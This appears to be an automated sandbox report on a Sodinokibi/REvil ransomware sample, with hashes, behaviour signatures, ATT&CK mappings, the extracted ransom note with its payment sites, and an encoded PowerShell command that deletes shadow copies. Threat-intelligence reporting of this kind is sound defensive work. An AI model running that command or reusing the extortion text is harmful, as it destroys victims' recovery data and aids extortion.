Analysis

  • max time kernel
    143s
  • max time network
    165s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    24-01-2022 02:26

General

  • Target

    1fb842e87f23e37ab39e201a024845c323c3d239331768db694dca96ed53d8c7.exe

  • Size

    164KB

  • MD5

    576e872bba0796398f654d327225dc4b

  • SHA1

    7a50311e51b5a04e23f66a2e30891fb10c46eb66

  • SHA256

    1fb842e87f23e37ab39e201a024845c323c3d239331768db694dca96ed53d8c7

  • SHA512

    6bc556d8eb36e1e23b5b4f180897513a1578e466019bb3dc43007f37b194705ed9176edc8b1ceb14222bf3bc169c1b172c9dbfd2e1968b94a4c77a8bd14bea89

Score
10/10

Malware Config

Extracted

Path

C:\0bj0vor-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion 0bj0vor. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/0C667E1E19995FDC 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/0C667E1E19995FDC Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: E7+hBxUyJq+5/jzulQQBU7JJss3QU3th06lwBltJBwDrf/minaG/YFMduOXmB+nX 8s2U4hL/JgK4mqGgcQLk8YKs+lZuC0RrEzhLVxLSFgawZbGKB9ZJbwHGuZb74tIQ EPujiTQcwptT5pxY33Ay3PZQlI7q0iL+wPP91EhoiIwdSmMshPKqhuNZKTFK8gcu zAD6JvaBKWNqqoeXX/f9GQnpoCw+BaUTI4ju4quBZka1e6ByDPbP6pJRB1kPYag9 jdwinYCepNX//47nQnGK3ReRA0e457ZDiB4Pa+VNRIV7c+N+WYuAIMePi3F7+FEg VdWKAgaKUZSk6uPk9k90qrZHWpYfNZbOy8VpI6/c3AqZMiGgYAGWZpQYFDgi85ye Fjojo4NB83DdR7HfkWOyJuA4TBHdO8wfU+LDPzG2N6rnSQa8dFwEl1xb8meELj1H 86ZtMk8Wkvhf82utkMaW+Hly/3tw5JteGKNJRIBY8hHE/omRsSzKvy1ZJpXwkHEw Hss/51nVZhIEpVTd6eXbVc1qLlnX8LZ1QaPS6Z8mv0uBUo3rwc6vOS+K+BGaj8g8 w7yPIEin9Q7Zz8gRArOKgLN2w8skj7Th4ecHhZzJE0yvlErFOWfJ50DyZO8tC5v1 srsq5Lqj/q3COOOHhOj55ehpxyncXmTwdpyGq1/tm/EFC5daszwg6l9Boqanj6/g Yqtk+8wBADHToO9efrDrvSijfRS/0OmpY/H7EqhAZS+ioe2l30V4P7pjhvU6KeAP A02SxjF2jW6rN3bv+6x7cUNxI5mHJ2y1Fl589fh6cxzzkVJ5781Nko5B7rUj+a9v BYBDEJsvjoVkXxI5JzhC6FFxtF7y+E+Os8FLtEAkIoCVHgUcqHrVGicto7OmADQV yTIy64OmNNR9EGEROc+ff4GIrGWBfiiVcZjRwtBZ5gpnKzB5au2axoyAMpxNFQJ3 r5jnqRfIC82TRGTSqVm4DEu3UIWfPrCSQNHs7fNMAVKGiY99hIN7Og0hJF0XMPeK su4pvHIexGNLjHHvKI6TdMGi2xGFTeBBlTgXgiSUecOXbFscHCGSUhVWg9kIL7ZY IpjrueksQa6BAVxZD8YhallH/BqVWuTo9uox/z1DJCWA4OUDcH0rFGmN Extension name: 0bj0vor ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/0C667E1E19995FDC

http://decryptor.top/0C667E1E19995FDC

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies extensions of user files 9 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 19 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\1fb842e87f23e37ab39e201a024845c323c3d239331768db694dca96ed53d8c7.exe
    "C:\Users\Admin\AppData\Local\Temp\1fb842e87f23e37ab39e201a024845c323c3d239331768db694dca96ed53d8c7.exe"
    1⤵
    • Modifies extensions of user files
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:3308
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:704
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:596
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:668

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    1
    T1082

    Impact

    Defacement

    1
    T1491

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/704-120-0x0000017D2DE50000-0x0000017D2DE72000-memory.dmp
      Filesize

      136KB

    • memory/704-125-0x0000017D30020000-0x0000017D30096000-memory.dmp
      Filesize

      472KB

    • memory/704-130-0x0000017D2DEC0000-0x0000017D2DEC2000-memory.dmp
      Filesize

      8KB

    • memory/704-131-0x0000017D2DEC3000-0x0000017D2DEC5000-memory.dmp
      Filesize

      8KB